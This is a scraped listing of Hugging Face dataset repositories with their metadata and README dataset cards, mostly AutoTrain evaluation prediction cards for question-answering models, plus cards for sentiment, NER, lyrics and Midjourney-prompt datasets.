autoevaluate/autoeval-staging-eval-project-e81e3618-f3e1-472b-97e0-2794cda0adb2-409
2022-07-21T16:09:50.000Z
null
false
127f37dff7cde0aad160e7e0343214ae6114046e
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-e81e3618-f3e1-472b-97e0-2794cda0adb2-409/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-df92c53c-2bfd-442d-8572-7541578e7feb-4110
2022-07-21T16:23:07.000Z
null
false
37906d94ced6a00549b67d7e5d5bd8b295042f5d
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-df92c53c-2bfd-442d-8572-7541578e7feb-4110/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
calbert
null
null
null
false
1
false
calbert/hinglish-large
2022-09-22T13:54:30.000Z
null
false
e3d88e993898dafec8e57a66d67a24b757568ad5
[]
[ "annotations_creators:found", "language_bcp47:en-hi", "language_creators:found", "license:cc-by-4.0", "multilinguality:multilingual", "multilinguality:other-hindi-english-transliteration", "size_categories:100K<n<1M", "tags:calbert", "tags:code-mixing", "tags:code-mixed", "tags:hinglish", "tag...
https://huggingface.co/datasets/calbert/hinglish-large/resolve/main/README.md
--- annotations_creators: - found language_bcp47: - en-hi language_creators: - found license: - cc-by-4.0 multilinguality: - multilingual - other-hindi-english-transliteration pretty_name: IndicCorp Hinglish size_categories: - 100K<n<1M source_datasets: [] tags: - calbert - code-mixing - code-mixed - hinglish - india - indic - english - hindi task_categories: - feature-extraction - fill-mask - sentence-similarity - text2text-generation task_ids: - masked-language-modeling ---
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4611
2022-07-21T16:34:17.000Z
null
false
738a202f3044f0e5191aeee1061701c61f15e6cb
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4611/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4612
2022-07-21T17:25:56.000Z
null
false
6d679cc141274969e47290ea5e6e6b3f25016591
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-9ec0b53a-81c5-4d01-88f6-bf53413cd1a8-4612/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/distilbert-base-cased-distilled-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
rjac
null
null
null
false
3
false
rjac/all-the-news-2-1-Component-ones-cluster-labels
2022-07-31T16:42:40.000Z
null
false
56bcdcb3662d0c7a9409485d4499472ab7302350
[]
[]
https://huggingface.co/datasets/rjac/all-the-news-2-1-Component-ones-cluster-labels/resolve/main/README.md
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-7c1a5e5f-11505530
2022-07-21T17:47:03.000Z
null
false
1c37d22eef2e4e729d8908c098b0362848f42c51
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-7c1a5e5f-11505530/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
iuihgisgsd
null
null
null
false
1
false
iuihgisgsd/KHGKJHKGH
2022-07-21T17:58:38.000Z
null
false
4cef5e07f40409be5073c3f94d5d5e7ef5ce7f62
[]
[ "license:cc-by-sa-4.0" ]
https://huggingface.co/datasets/iuihgisgsd/KHGKJHKGH/resolve/main/README.md
--- license: cc-by-sa-4.0 ---
FinanceInc
null
null
null
false
33
false
FinanceInc/auditor_sentiment
2022-07-21T19:03:51.000Z
null
false
42ab35c272ec2a3248521e36ffffed0115dab581
[]
[ "annotations_creators:expert-generated", "language_creators:found", "language:en", "multilinguality:monolingual", "size_categories:1K<n<10K", "source_datasets:original", "task_categories:text-classification", "task_ids:multi-class-classification", "task_ids:sentiment-classification" ]
https://huggingface.co/datasets/FinanceInc/auditor_sentiment/resolve/main/README.md
--- annotations_creators: - expert-generated language_creators: - found language: - en multilinguality: - monolingual size_categories: - 1K<n<10K source_datasets: - original task_categories: - text-classification task_ids: - multi-class-classification - sentiment-classification paperswithcode_id: null pretty_name: Auditor_Sentiment --- # Dataset Card for Auditor Sentiment ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) ## Dataset Description Auditor review sentiment collected by News Department - **Point of Contact:** Talked to COE for Auditing, currently sue@demo.org ### Dataset Summary Auditor sentiment dataset of sentences from financial news. The dataset consists of several thousand sentences from English language financial news categorized by sentiment. 
### Supported Tasks and Leaderboards Sentiment Classification ### Languages English ## Dataset Structure ### Data Instances ``` "sentence": "Pharmaceuticals group Orion Corp reported a fall in its third-quarter earnings that were hit by larger expenditures on R&D and marketing .", "label": "negative" ``` ### Data Fields - sentence: a tokenized line from the dataset - label: a label corresponding to the class as a string: 'positive' - (2), 'neutral' - (1), or 'negative' - (0) ### Data Splits A train/test split was created randomly with a 75/25 split ## Dataset Creation ### Curation Rationale To gather our auditor evaluations into one dataset. Previous attempts using off-the-shelf sentiment had only 70% F1, this dataset was an attempt to improve upon that performance. ### Source Data #### Initial Data Collection and Normalization The corpus used in this paper is made out of English news reports. #### Who are the source language producers? The source data was written by various auditors. ### Annotations #### Annotation process This release of the auditor reviews covers a collection of 4840 sentences. The selected collection of phrases was annotated by 16 people with adequate background knowledge on financial markets. The subset here is where inter-annotation agreement was greater than 75%. #### Who are the annotators? They were pulled from the SME list, names are held by sue@demo.org ### Personal and Sensitive Information There is no personal or sensitive information in this dataset. ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases All annotators were from the same institution and so interannotator agreement should be understood with this taken into account. ### Licensing Information License: Demo.Org Proprietary - DO NOT SHARE This dataset is based on the [financial phrasebank](https://huggingface.co/datasets/financial_phrasebank) dataset.
nbsullivan
null
null
null
false
1
false
nbsullivan/song_lyrics
2022-07-21T20:19:14.000Z
null
false
795824409d295424e69005d881d5370f177265b8
[]
[]
https://huggingface.co/datasets/nbsullivan/song_lyrics/resolve/main/README.md
annotations_creators: - no-annotation language: - en language_creators: - found license: - unknown multilinguality: - monolingual pretty_name: structured song lyrics size_categories: [] source_datasets: [] tags: - lyrics task_categories: - text-generation task_ids: - language-modeling [Needs More Information] # Dataset Card for song_lyrics ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** [Needs More Information] - **Repository:** [Needs More Information] - **Paper:** [Needs More Information] - **Leaderboard:** [Needs More Information] - **Point of Contact:** [Needs More Information] ### Dataset Summary Structured song lyrics ### Supported Tasks and Leaderboards text generation ### Languages English ## Dataset Structure ### Data Instances [Needs More Information] ### Data Fields [Needs More Information] ### Data Splits [Needs More Information] ## Dataset Creation ### Curation Rationale [Needs More Information] ### Source Data #### Initial Data Collection and Normalization [Needs More Information] #### Who are the source 
language producers? [Needs More Information] ### Annotations #### Annotation process [Needs More Information] #### Who are the annotators? [Needs More Information] ### Personal and Sensitive Information [Needs More Information] ## Considerations for Using the Data ### Social Impact of Dataset [Needs More Information] ### Discussion of Biases [Needs More Information] ### Other Known Limitations [Needs More Information] ## Additional Information ### Dataset Curators [Needs More Information] ### Licensing Information [Needs More Information] ### Citation Information [Needs More Information]
succinctly
null
null
null
false
99
false
succinctly/midjourney-prompts
2022-07-22T01:49:16.000Z
null
false
e670508f77f244a24a8bcf100f02011df9d8435b
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/succinctly/midjourney-prompts/resolve/main/README.md
--- license: apache-2.0 --- [Midjourney](https://midjourney.com) is an independent research lab whose broad mission is to "explore new mediums of thought". In 2022, they launched a text-to-image service that, given a natural language prompt, produces visual depictions that are faithful to the description. Their service is accessible via a public [Discord server](https://discord.com/invite/midjourney): users issue a query in natural language, and the Midjourney bot returns AI-generated images that follow the given description. The raw dataset (with Discord messages) can be found on Kaggle: [Midjourney User Prompts & Generated Images (250k)](https://www.kaggle.com/datasets/succinctlyai/midjourney-texttoimage). The authors of the scraped dataset have no affiliation to Midjourney. This HuggingFace dataset was [processed](https://www.kaggle.com/code/succinctlyai/midjourney-text-prompts-huggingface) from the raw Discord messages to solely include the text prompts issued by the user (thus excluding the generated images and any other metadata). It could be used, for instance, to fine-tune a large language model to produce or auto-complete creative prompts for image generation. Check out [succinctly/text2image-prompt-generator](https://huggingface.co/succinctly/text2image-prompt-generator), a GPT-2 model fine-tuned on this dataset.
arize-ai
null
# @InProceedings{huggingface:dataset, # title = {A great new dataset}, # author={huggingface, Inc. # }, # year={2020} # } #
This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on product reviews from an e-commerce store. The reviews are labeled on a scale from 1 to 5 (stars). The training & validation sets are fully composed by reviews written in english. However, the production set has some reviews written in spanish. At Arize, we work to surface this issue and help you solve it.
false
1
false
arize-ai/cifar10_quality_drift
2022-10-25T10:40:25.000Z
null
false
35a56f3c865a3b3abdc7e3386804fe2063efd6f2
[]
[ "annotations_creators:expert-generated", "language_creators:expert-generated", "language:en", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:extended|imdb", "task_categories:image-classification", "task_ids:multi-class-classification" ]
https://huggingface.co/datasets/arize-ai/cifar10_quality_drift/resolve/main/README.md
--- annotations_creators: - expert-generated language_creators: - expert-generated language: - en license: - mit multilinguality: - monolingual size_categories: - 10K<n<100K source_datasets: - extended|imdb task_categories: - image-classification task_ids: - multi-class-classification pretty_name: sentiment-classification-reviews-with-drift --- # Dataset Card for `reviews_with_drift` ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description ### Dataset Summary This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on a large Movie Review Dataset mixed with some reviews from a Hotel Review Dataset. The training/validation set are purely obtained from the Movie Review Dataset while the production set is mixed. Some other features have been added (`age`, `gender`, `context`) as well as a made up timestamp `prediction_ts` of when the inference took place. 
### Supported Tasks and Leaderboards `text-classification`, `sentiment-classification`: The dataset is mainly used for text classification: given the text, predict the sentiment (positive or negative). ### Languages Text is mainly written in english. ## Dataset Structure ### Data Instances [More Information Needed] ### Data Fields [More Information Needed] ### Data Splits [More Information Needed] ## Dataset Creation ### Curation Rationale [More Information Needed] ### Source Data [More Information Needed] #### Initial Data Collection and Normalization [More Information Needed] #### Who are the source language producers? [More Information Needed] ### Annotations [More Information Needed] #### Annotation process [More Information Needed] #### Who are the annotators? [More Information Needed] ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators [More Information Needed] ### Licensing Information [More Information Needed] ### Citation Information [More Information Needed] ### Contributions Thanks to [@fjcasti1](https://github.com/fjcasti1) for adding this dataset.
Gpaiva
null
""" _DESCRIPTION =
(pt) NERDE é um dataset para NER a partir de documentos jurídicos da defesa econômica em português do Brasil, foi criado em colaboração com o Cade e o laboratório LATITUDE/UnB. (en) NERDE is a NER dataset from economic defense legal documents in Brazilian Portuguese, created in collaboration with Cade and the LATITUDE/UnB laboratory.
false
1
false
Gpaiva/NERDE
2022-07-28T01:27:18.000Z
null
false
3a0ac3296e467afae7bd4d6ffc6ab795af8904d9
[]
[ "annotations_creators:expert-generated", "language:pt", "language_creators:expert-generated", "license:cc-by-4.0", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:original", "tags:ner", "tags:portuguese-ner", "tags:economic-defense", "task_categories:token-classific...
https://huggingface.co/datasets/Gpaiva/NERDE/resolve/main/README.md
--- annotations_creators: - expert-generated language: - pt language_creators: - expert-generated license: - cc-by-4.0 multilinguality: - monolingual pretty_name: NERDE size_categories: - 10K<n<100K source_datasets: - original tags: - ner - portuguese-ner - economic-defense task_categories: - token-classification task_ids: - named-entity-recognition --- # Dataset Card for NERDE ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Repository:** [NERDE repository](https://github.com/guipaiva/NERDE) - **Point of Contact:** [Guilherme P. Paiva](mailto:guipaivagpp@gmail.com) ### Dataset Summary NERDE is a dataset for Named Entity Recognition for Economic Defense. It was created in collaboration with LATITUDE/UnB Laboratory and the Administrative Council for Economic Defense (Cade) ### Supported Tasks and Leaderboards [More Information Needed] ### Languages The language in the dataset is Brazilian Portuguese from legal documents. 
The BCP-47 code for Brazilian Portuguese is pt-BR ## Dataset Structure ### Data Instances [More Information Needed] ### Data Fields [More Information Needed] ### Data Splits [More Information Needed] ## Dataset Creation ### Curation Rationale [More Information Needed] ### Source Data #### Initial Data Collection and Normalization [More Information Needed] #### Who are the source language producers? [More Information Needed] ### Annotations #### Annotation process [More Information Needed] #### Who are the annotators? [More Information Needed] ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators [More Information Needed] ### Licensing Information [More Information Needed] ### Citation Information [More Information Needed] ### Contributions Thanks to [@guipaiva](https://github.com/guipaiva) for adding this dataset.
ASCCCCCCCC
null
null
null
false
18
false
ASCCCCCCCC/mix_info
2022-07-22T03:41:12.000Z
null
false
04a24bc0667e9a45a51f0ada6681aebc35898723
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/ASCCCCCCCC/mix_info/resolve/main/README.md
--- license: apache-2.0 ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-sst2-ee5c821a-11545531
2022-07-22T06:33:53.000Z
null
false
49ea9e40149871828d02aed166988c67dcda75c4
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:sst2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-sst2-ee5c821a-11545531/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - sst2 eval_info: task: multi_class_classification model: distilbert-base-uncased-finetuned-sst-2-english metrics: [] dataset_name: sst2 dataset_config: default dataset_split: train col_mapping: text: sentence target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: distilbert-base-uncased-finetuned-sst-2-english * Dataset: sst2 * Config: default * Split: train To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Neez](https://huggingface.co/Neez) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cnn_dailymail-7c900a64-11555532
2022-07-23T22:08:35.000Z
null
false
97197c4a27472a1cb112d4f384ba6f70e040b2a6
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cnn_dailymail" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cnn_dailymail-7c900a64-11555532/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cnn_dailymail eval_info: task: summarization model: tuner007/pegasus_summarizer metrics: ['accuracy', 'f1', 'precision', 'recall'] dataset_name: cnn_dailymail dataset_config: 3.0.0 dataset_split: train col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: tuner007/pegasus_summarizer * Dataset: cnn_dailymail * Config: 3.0.0 * Split: train To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Neez](https://huggingface.co/Neez) for evaluating this model.
deepklarity
null
null
null
false
5
false
deepklarity/huggingface-spaces-dataset
2022-07-22T09:10:17.000Z
null
false
d1b54f2b452230e082fbdc30fe42b0f96c44ff16
[]
[ "license:cc" ]
https://huggingface.co/datasets/deepklarity/huggingface-spaces-dataset/resolve/main/README.md
--- license: cc --- This dataset provides information of all the spaces (~6,200 at time of snapshot) created on [HuggingFace Spaces](https://huggingface.co/spaces) 🤗. Most of the data comes from a public API endpoint while some of the data is enriched by web scraping. The dataset is intended to provide a snapshot of the spaces and was last updated in first week of *July-2022*. Along with the name of the space, the dataset consists of following columns: - likes (number of likes on the space) - sdk (streamlit,gradio or other) - status (was running successfully or had error when snapshot was taken) - total_commits (number of commits in the space) - last_commit (when did last commit happen) - community_interactions (number of interactions in the newly introduced Community tab) Apart from these, we have also added some post-processing columns (where space was using gradio): - inputs (Image/Text/Slider etc) - outputs (Image/Audio/Textbox etc) - ai_ml_reqs (If the requirements.txt contain a popular ML repo dependency like: torch, tensorflow, pandas, sklearn, scipy etc) Contributors: - [Abdullah Meda](https://www.linkedin.com/in/abdmeda/) - [Ayush Ranwa](https://twitter.com/Ayushranwa6) - [Deepak Rawat](https://twitter.com/dsr_ai) - [Kartik Godawat](https://twitter.com/kartik_godawat) Please reach out to us for any queries or discussions.
ccpp
null
null
null
false
1
false
ccpp/test1
2022-07-22T09:01:23.000Z
null
false
def0f9aff0c7f41639cb13e0307cdb17d76965ec
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/ccpp/test1/resolve/main/README.md
--- license: afl-3.0 ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585539
2022-07-22T09:33:29.000Z
null
false
f2f8f031c380b6d0ccd2a8102a40717e4a036884
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585539/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585538
2022-07-22T09:34:17.000Z
null
false
add96f0971c3921b3b77150838ef0d0494986fa9
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585538/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585540
2022-07-22T09:33:32.000Z
null
false
7d2e66ed02c4ff5b893295433a4e2f9f7aaa3592
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-7ad816c0-11585540/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/distilbert-base-cased-distilled-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595541
2022-07-22T09:34:44.000Z
null
false
ae4442bb10bc1cd57779ad99594d94db75420667
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595541/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595542
2022-07-22T09:34:19.000Z
null
false
91aaa4a325ad414cfcde8690892b7dedb5425530
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595542/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
12
false
autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595543
2022-07-22T09:34:25.000Z
null
false
c9fbf6541ad051a61f3bea8ea553af895ddb0449
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595543/resolve/main/README.md
